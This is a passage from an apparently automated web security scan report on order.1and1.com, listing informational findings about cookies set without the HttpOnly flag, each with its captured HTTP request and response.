Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:17 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=243737f9e62df400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingBlog;jsessionid=EF0768155A7F7D2C704B8F00B5188B4C.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.73. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__PFIX_TST_

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingCgi HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:43:52 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=27a6c0dfbabd7800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingCgi;jsessionid=720AEC6B9B0A0BAFFB10502C5FA97453.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.74. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:01 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:58:08 GMT; Path=/
ETag: 41dae3a2113aed17c2abdf537c164ae5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17084


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.75. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCnba

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__PFIX_TST_

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingCnba HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:11 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=e60106dc2a1f800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingCnba;jsessionid=D6CDF4CECE4121FCCF576B5A13F2AD48.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.76. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCnba

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:20 GMT; Path=/
ETag: 9de78ef384b1a75fd3107fb41be3e05d
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27882


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.77. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingContentmoduls

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__PFIX_TST_

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingContentmoduls HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:43:21 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3451d6a5fb8ed000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls;jsessionid=E709A95999ECBC45D3EBA32D0D1FD636.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.78. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingContentmoduls

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingContentmoduls;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:23 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDInLl5nLSAhHRwhHjI1MDM0LS4=; Expires=Fri, 07-Apr-2079 21:57:30 GMT; Path=/
ETag: abf5727759dd6b49542001d0cd44cd90
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18650


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.79. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDriving

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__PFIX_TST_

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingDriving HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:43:43 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3cd2f340f5d83400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingDriving;jsessionid=0AA7D5A30CA9BA9E5AECE5A579B09F5B.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.80. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDriving

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingDriving;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:51 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=LcWY2OTowWVlZU2ZcYylhWygaO3RnYTlQQz0lKSYmJSMlIyAgIyIcHyMtLy4tKk89aV5gbiYoI1MsVmUrHh8bGjYyMDMxKzMqKTJqazEmLV1mLB8gHBsgNDE0LzIzLC0=; Expires=Fri, 07-Apr-2079 21:57:58 GMT; Path=/
ETag: ffe3148f77ea320c02a818d12e539d7c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18924


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.81. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDsc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__PFIX_TST_

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingDsc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:42:12 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=6f93047c1ec73800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingDsc;jsessionid=2C5BC2EEA9822D8D0B41D31E78D7098E.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.82. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDsc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:17 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=xZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:56:24 GMT; Path=/
ETag: 7ed80b0242401f3398613c8cd6784c77
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18703


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.83. http://order.1and1.com/xml/order/FeatureSite-buildingElements

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingElements

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:17 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Gdms7Pj81Xl5eWGthaC5mYC0fKWJVTydVSEIqLisrKigqKCUlKCchJCgbHRwbGFRCbmNlcystKFgxW2owIyQgHyQgHiEfMDgvLjdvcDYrMmJrMSQlISAlIh8iHSA4MTI=; Expires=Fri, 07-Apr-2079 21:57:24 GMT; Path=/
ETag: 36e58228274f63c60138fce36fb995c9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20878


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.84. http://order.1and1.com/xml/order/FeatureSite-buildingElements

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingElements

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__PFIX_TST_

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingElements HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
